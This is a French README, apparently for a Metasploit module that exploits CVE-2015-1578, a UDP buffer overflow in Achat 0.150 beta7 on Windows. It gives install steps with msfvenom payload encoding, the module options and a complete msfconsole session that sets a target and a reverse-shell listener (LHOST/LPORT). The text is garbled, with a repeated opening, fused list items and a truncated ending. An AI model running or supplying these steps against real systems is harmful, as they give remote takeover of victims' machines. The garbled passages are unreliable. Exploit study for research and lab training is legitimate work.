Ceci est un exploit de module Metasploit de preuve de concept pour CVE-2015-1578, une vulnérabilité de débordement de tampon dans Achat 0.150 beta7 sur Windows. L'exploitation conduit à une exécution de code à distance via un paquet UDP spécialement conçu.
Ceci est un module Metasploit pour CVE-2015-1578, une vulnérabilité de débordement de tampon dans Achat 0.150 beta7 sur Windows. L'exploitation permet l'exécution de code à distance via un paquet UDP conçu.
Ce module est conçu pour servir d'exemple propre, minimal et bien structuré du développement d'exploit Metasploit. Il démontre :
msfvenommsfvenom dans votre $PATHmsfvenom pour générer un payload avec l'encodage x86/unicode_mixed et des caractères indésirables personnalisés./install.sh
Ensuite, lancez Metasploit et exécutez :
reload_all
use exploit/windows/yaldobaoth/achat_bof
Options
RHOSTS – Adresse IP cible (obligatoire)LHOST – Adresse IP locale pour le shell inverse (obligatoire)LPORT – Port local pour le shell inverse (par défaut : 4444)RPORT – Port UDP distant sur la cible (par défaut : 9256)Exemple d'utilisation
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
Cela va :
LHOST:LPORT spécifié